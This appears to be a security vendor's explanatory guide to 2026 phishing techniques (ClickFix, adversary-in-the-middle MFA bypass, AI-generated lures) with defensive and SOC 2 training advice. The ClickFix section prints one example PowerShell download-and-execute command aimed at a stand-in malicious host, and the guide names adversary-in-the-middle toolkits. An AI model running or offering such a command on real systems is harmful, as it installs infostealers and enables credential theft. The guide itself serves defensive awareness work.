Phishing in 2026: ClickFix, Adversary-in-the-Middle, and AI-Powered Social Engineering

Key Takeaways

• ClickFix attacks trick users into copying and pasting malicious PowerShell commands under the guise of "fixing" a technical problem
• Adversary-in-the-Middle (AitM) phishing proxies intercept authentication in real-time, bypassing MFA entirely
• AI-generated phishing eliminates traditional red flags like grammatical errors, enabling hyper-personalized attacks at scale
• Security awareness training must evolve to focus on behavioral indicators rather than quality tells
• SOC 2 security awareness requirements demand documented training programs that address current threats

The Nigerian prince has retired. Today's phishing attacks are operated by sophisticated threat actors using automation, AI, and psychological manipulation techniques that would make a social engineer from 2015 weep with envy.

In 2026, phishing is no longer about spotting typos or suspicious sender addresses. Attackers have adopted techniques that exploit trust in legitimate platforms, bypass multi-factor authentication, and generate content so convincing that even security-trained employees fall victim.

This guide covers three attack patterns that security teams need to understand and defend against right now.

1. ClickFix: When Users Become the Attack Vector

ClickFix is a social engineering technique that weaponizes technical troubleshooting. Instead of delivering malware through email attachments or malicious links, attackers trick users into executing PowerShell commands on their own machines.

How ClickFix Works

The attack typically unfolds across four stages:

Stage 1: Initial Lure

The victim encounters what appears to be a technical problem. This could be:

• A fake error message on a compromised or spoofed website ("Your browser needs to be updated")
• A CAPTCHA-like verification prompt ("Verify you're human by completing these steps")
• A document that won't render ("To view this document, follow the instructions below")
• A fake technical support page impersonating Google, Microsoft, or another trusted vendor

Stage 2: The "Fix"

The page presents step-by-step instructions to resolve the issue. The user is told to:

1. Press Win + R to open the Run dialog (or open Terminal on macOS)
2. Paste a command that was automatically copied to their clipboard
3. Press Enter

What appears on screen might look like a simple browser fix or verification code. The actual command hidden in the clipboard is obfuscated PowerShell that downloads and executes malware.

Stage 3: Execution

When the user pastes and runs the command, they're executing something like:

1powershell -w hidden -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('https://malicious-domain.com/payload.ps1')"

This command:

• Runs PowerShell in a hidden window (-w hidden)
• Bypasses execution policy restrictions (-ep bypass)
• Downloads and immediately executes a remote script (IEX)

Stage 4: Payload Delivery

The downloaded script typically installs infostealers like Lumma Stealer or Atomic Stealer (on macOS). These harvest:

• Browser cookies and saved passwords
• Cryptocurrency wallet files
• SSH keys and cloud credentials
• MFA backup codes stored in notes or documents

Why ClickFix Bypasses Security Controls

Traditional email security, endpoint protection, and web filters often miss ClickFix attacks because:

• No malicious attachment: The initial email or page contains only text instructions
• User-initiated execution: The victim manually runs the command, bypassing behavioral analysis
• Trusted platforms: Attackers host lures on legitimate services (Google Sites, GitHub, Notion)
• Clipboard manipulation: The malicious command is copied via JavaScript, invisible to the user

Real-World ClickFix Campaigns

Security researchers have documented ClickFix campaigns impersonating:

• Google Chrome error pages requesting users to "fix" display issues
• Microsoft Teams meeting pages with verification requirements
• Cloudflare CAPTCHA pages on compromised websites
• GitHub authentication prompts for accessing private repositories

The technique has been attributed to both financially motivated cybercriminals and nation-state actors, with campaigns targeting cryptocurrency users, developers, and enterprise employees.

2. Adversary-in-the-Middle: Bypassing MFA in Real-Time

Multi-factor authentication was supposed to solve phishing. If attackers steal your password, they still can't log in without the second factor. That assumption no longer holds.

Adversary-in-the-Middle (AitM) phishing, also called real-time phishing proxies, defeats MFA by intercepting the entire authentication session as it happens.

How AitM Attacks Work

Step 1: Phishing Page Setup

Attackers deploy a reverse proxy server that sits between the victim and the legitimate authentication service (Microsoft 365, Okta, Google Workspace). The phishing page looks identical to the real login page because it is the real login page, just proxied through the attacker's infrastructure.

Step 2: Credential Capture

When the victim enters their username and password, the proxy:

1. Captures the credentials in plaintext
2. Forwards them to the legitimate authentication service
3. Relays the MFA prompt back to the victim

Step 3: MFA Bypass

The victim completes their normal MFA flow, entering a TOTP code, approving a push notification, or using a hardware key. The proxy captures this too and completes the authentication on behalf of the attacker.

Step 4: Session Hijacking

Once authentication succeeds, the attacker captures the session cookies. With these cookies, they can access the victim's account without needing credentials or MFA. The session remains valid until it expires or is explicitly revoked.

AitM Toolkits in the Wild

Several open-source and commercial toolkits make AitM attacks accessible:

• Evilginx2: The most well-known AitM framework, capable of capturing session tokens from most authentication providers
• Modlishka: Another reverse proxy tool designed for phishing engagements
• Muraena: Automated phishing infrastructure with session capture

These tools are trivial to deploy. An attacker can spin up a convincing Microsoft 365 phishing infrastructure in under an hour.

What AitM Looks Like to the Victim

From the victim's perspective, everything appears normal:

• The login page looks legitimate (because it's proxying the real page)
• SSL/TLS shows a valid certificate (for the attacker's domain)
• MFA works as expected
• After login, they're redirected to the real service

The only indicators something is wrong:

• The URL domain is slightly different (often using typosquatting)
• The login flow might have minor latency

Why Traditional Defenses Fail

AitM attacks bypass:

• Password policies: The real password works perfectly
• MFA: All authentication factors are captured and replayed in real-time
• Email security: The phishing link passes reputation checks if hosted on fresh or compromised domains
• User training: The page is functionally identical to legitimate authentication

3. AI-Powered Social Engineering: The End of Obvious Red Flags

For years, security awareness training taught employees to spot phishing through quality indicators: grammatical errors, awkward phrasing, generic greetings, and inconsistent branding. AI has eliminated these tells entirely.

What AI Enables for Attackers

Flawless Language at Scale

Large language models generate grammatically perfect, contextually appropriate text in any language. An attacker who doesn't speak French can now craft convincing phishing emails in French, complete with appropriate formality levels and cultural references.

Hyper-Personalization

AI can synthesize information from LinkedIn, company websites, press releases, and social media to create highly targeted messages. A phishing email might reference:

• The target's recent promotion
• A project their team announced
• An upcoming conference they're attending
• Specific colleagues or reporting relationships

Voice Cloning and Deepfakes

Beyond text, attackers use AI-generated audio for vishing (voice phishing) attacks. With a few minutes of sample audio from YouTube interviews or earnings calls, attackers can clone an executive's voice for fraudulent phone calls.

How AI Phishing Differs from Traditional Attacks

Real-World Examples

Security researchers have documented AI being used to:

• Generate unique phishing pages for each target organization based on scraped branding
• Craft business email compromise (BEC) messages that match an executive's writing style
• Create realistic fake invoices with accurate vendor details
• Produce deepfake video messages for high-value fraud

Updating Your Security Awareness Program

Traditional training focused on identifying low-quality attacks. That model is obsolete. Here's how to adapt.

1. Train on Behavioral Indicators

Since quality-based detection no longer works, focus on behaviors that indicate phishing regardless of how polished the message appears:

• Unexpected requests: Any request for credentials, financial actions, or sensitive data through unusual channels
• Urgency and pressure: Artificial deadlines designed to bypass deliberate thinking
• Verification bypass: Requests to skip normal approval processes "just this once"
• Channel switching: Attempts to move communication off-platform or to personal devices

2. Implement Verification Procedures

Establish and reinforce out-of-band verification for sensitive actions:

• Financial transfers require voice confirmation through a known number (not the one provided in the email)
• Credential changes require approval through a separate authenticated channel
• Executive requests go through assistants who verify legitimacy

3. Run Realistic Simulations

Your phishing simulations should reflect current attack sophistication:

• Use AI-generated content in test campaigns
• Test ClickFix scenarios where users are asked to run commands
• Include AitM-style pages that proxy real login flows
• Target specific individuals with personalized pretexts

4. Measure What Matters

Track metrics that reflect actual risk:

• Time to report suspicious messages (faster is better)
• Credential submission rate on simulated AitM pages
• Command execution rate on ClickFix simulations
• Verification procedure compliance for sensitive requests

What SOC 2 Auditors Expect

SOC 2's Common Criteria include explicit requirements for security awareness (CC2.2 and CC1.4). Here's what auditors look for:

Documented Training Program

You need evidence of:

• Defined training curriculum covering current threats
• Regular delivery schedule (typically annual minimum, quarterly recommended)
• Completion tracking for all employees
• Updated content reflecting emerging attack techniques

Phishing Simulation Results

Auditors expect to see:

• Regular phishing tests (monthly or quarterly)
• Metrics showing employee performance
• Follow-up training for employees who fail simulations
• Trend data demonstrating improvement over time

Incident Response Integration

Your training should connect to actual response procedures:

• Clear reporting channels for suspected phishing
• Documented response playbooks
• Evidence that reported incidents are investigated

Continuous Improvement

Auditors look for evidence that your program adapts:

• Updates to training content based on new threats
• Adjustments based on simulation results
• Incorporation of lessons from actual incidents

Practical Defense Recommendations

Technical Controls

1. Deploy phishing-resistant MFA: FIDO2 security keys and passkeys are immune to AitM attacks because authentication is bound to the legitimate domain
2. Implement browser isolation: For high-risk users, isolate web browsing to prevent credential theft
3. Block PowerShell execution: For users who don't need it, disable PowerShell or restrict execution policies
4. Monitor for clipboard manipulation: Endpoint detection should flag unusual clipboard activity on web pages

Process Controls

1. Establish verification procedures: Document and enforce out-of-band confirmation for sensitive actions
2. Create escalation paths: Make it easy for employees to verify suspicious requests without feeling they're slowing things down
3. Regular tabletop exercises: Practice responding to sophisticated phishing scenarios

People Controls

1. Update training content: Ensure your program covers ClickFix, AitM, and AI-generated attacks
2. Reward reporting: Recognize employees who report phishing, even false positives
3. Executive targeting awareness: Brief leadership on their elevated risk profile and specific threats

The Bottom Line

Phishing in 2026 requires defenders to abandon assumptions that worked for the past decade. Grammatical errors are no longer a tell. MFA is no longer a complete defense. Users can be tricked into becoming the attack vector themselves.

The organizations that maintain security posture will be those that:

• Update training to focus on behavioral indicators instead of quality tells
• Deploy phishing-resistant authentication that defeats AitM attacks
• Implement verification procedures that don't rely on trusting message content
• Test their defenses with simulations that reflect actual attack sophistication

The threat actors have leveled up. Your defenses need to do the same.

Bastion helps SaaS companies build security programs that address modern threats. Our managed compliance services for SOC 2 and ISO 27001 include security awareness training that covers current attack techniques, not yesterday's threats. Get started with Bastion →